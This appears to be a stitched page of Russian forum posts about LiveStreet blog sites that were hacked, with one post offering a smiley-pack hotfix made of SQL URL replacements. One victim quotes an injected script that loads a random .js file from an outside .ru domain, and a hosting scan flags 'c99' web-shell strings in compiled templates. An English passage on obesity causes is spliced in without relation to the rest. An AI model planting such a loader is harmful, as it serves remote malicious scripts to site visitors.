Как защитить сайт от взлома?

Всем привет!

Хочу поделиться некоторыми пережитым опытом и услышать мнения специалистов.

Не так давно на сайте, которым я занимаюсь более 3 лет, появился вредоносный код. Сайт имеет большую аудиторию и по этой причине стал жертвой хакера(ов).

В компилированные файлы шаблона вставлялся код следующего вида
<script>;document.write('<'+'script src=http://fljjsh'+'dqkrqq.ru/'+Math.round(Math.random()*99999999)+'.js></'+'script'+'>');</script>


Читать дальше →

Проблема с rss на feedburner.

Добрый день,

Обнаружил что feedburner перестал показывать мой фид. Версия движка 0.5.1.

И когда просматриваю урл фида на feedburner, вижу чужой код внизу фида
//feeds.feedburner.com/oedeinfo




Ones used in animals — growth of suburbia requiring driving instead of walking — practical elimination of phys-ed in schools — shift from agrarian to industrial economy — the rise of super-high calorie fast food/convenience food — cheap food prices (relative to the past, especially meat)

и так далее…

Когда же смотрю урл фида на сайте — то ничего такого нет.
//www.o-ede.info//rss/index

Я так понимаю что меня взломали, только вот не могу найти что, где и как. Буду очень признателен за помощь.

СПасибо

Взлом сайта

Здравствуйте!

У меня происходит взлом сайта. Злоумышленники вставляют на моем сайте внешние ссылки, визуально закрытые, но открытые для индексации.

Хостинг сообщает, что взлом происходит через подозрительные файлы LiveStreet.

/home/yaotdikh/public_html/blog/templates/compiled/synio/0b1afa8c2514a92285582b642c4671c99138b1fa.file.page.tpl.php

File: /home/yaotdikh/public_html/blog/templates/compiled/simple/b0615a9655d4b446a1ca96d4d876bc8611b0adcf.file.topic.tpl.php
String:: c99

File: /home/yaotdikh/public_html/blog/templates/compiled/simple/929848b885f20d3bd4919adc7834880e8d2aed98.file.comment_paging.tpl.php
String:: c99

File: /home/yaotdikh/public_html/blog/templates/compiled/simple/17cb67555072beee834585db5a2468d7b96273c3.file.topic_vkcomments.tpl.php
String:: c99

File: /home/yaotdikh/public_html/blog/templates/compiled/simple/d7435d6c70197bfcc0d3d4aeee59b0922aac50a3.file.blog.tpl.php
String:: c99

File: /home/yaotdikh/public_html/blog/templates/compiled/simple/9b85fe0629e9b89d81d374834bcd9ceba12fe565.file.blog.tpl.php
String:: c99

Как избежать этого?

Хотел спросить у знающих людей, как обезопасить LS от взлома, я не говорю о 100% защите которой не существует, просто хотелось бы услышать пару советов для относительно спокойной жизни сайта.

Ссылка на пациента: tydysh.tv

QipSmiles hotfix (docker47.free.fr browser warning)

Замена смайл-пака maliste

smiley.s3.amazonaws.com/maliste.zip
Распаковать в qipsmiles/smiles/ с заменой файлов.

MySQL комманды для замены смайлов в уже сохраненном контенте




На 0:50 видно окошко, в котором надо вписать эти комманды:
update `prefix_topic_content` set `topic_text`=replace(`topic_text`,'http://moktoipas.com/smileys/','http://smiley.s3.amazonaws.com/maliste/');
update `prefix_topic_content` set `topic_text`=replace(`topic_text`,'http://docker47.free.fr/divers/smileys/basic/','http://smiley.s3.amazonaws.com/maliste/');
update `prefix_topic_content` set `topic_text`=replace(`topic_text`,'http://docker47.free.fr/divers/smileys/_MSN/','http://smiley.s3.amazonaws.com/maliste/');
update `prefix_topic_content` set `topic_text`=replace(`topic_text`,'http://docker47.free.fr/divers/smileys/_gg3d.com/','http://smiley.s3.amazonaws.com/maliste/');

update `prefix_topic_content` set `topic_text_short`=replace(`topic_text_short`,'http://moktoipas.com/smileys/','http://smiley.s3.amazonaws.com/maliste/');
update `prefix_topic_content` set `topic_text_short`=replace(`topic_text_short`,'http://docker47.free.fr/divers/smileys/basic/','http://smiley.s3.amazonaws.com/maliste/');
update `prefix_topic_content` set `topic_text_short`=replace(`topic_text_short`,'http://docker47.free.fr/divers/smileys/_MSN/','http://smiley.s3.amazonaws.com/maliste/');
update `prefix_topic_content` set `topic_text_short`=replace(`topic_text_short`,'http://docker47.free.fr/divers/smileys/_gg3d.com/','http://smiley.s3.amazonaws.com/maliste/');

update `prefix_comment` set `comment_text`=replace(`comment_text`,'http://moktoipas.com/smileys/','http://smiley.s3.amazonaws.com/maliste/');
update `prefix_comment` set `comment_text`=replace(`comment_text`,'http://docker47.free.fr/divers/smileys/basic/','http://smiley.s3.amazonaws.com/maliste/');
update `prefix_comment` set `comment_text`=replace(`comment_text`,'http://docker47.free.fr/divers/smileys/_MSN/','http://smiley.s3.amazonaws.com/maliste/');
update `prefix_comment` set `comment_text`=replace(`comment_text`,'http://docker47.free.fr/divers/smileys/_gg3d.com/','http://smiley.s3.amazonaws.com/maliste/');


После выполнения mysql-комманд не забудьте сбросить кеш объектов


Если что-то ну никак не получается, обращайтесь в аську (она в профиле написана).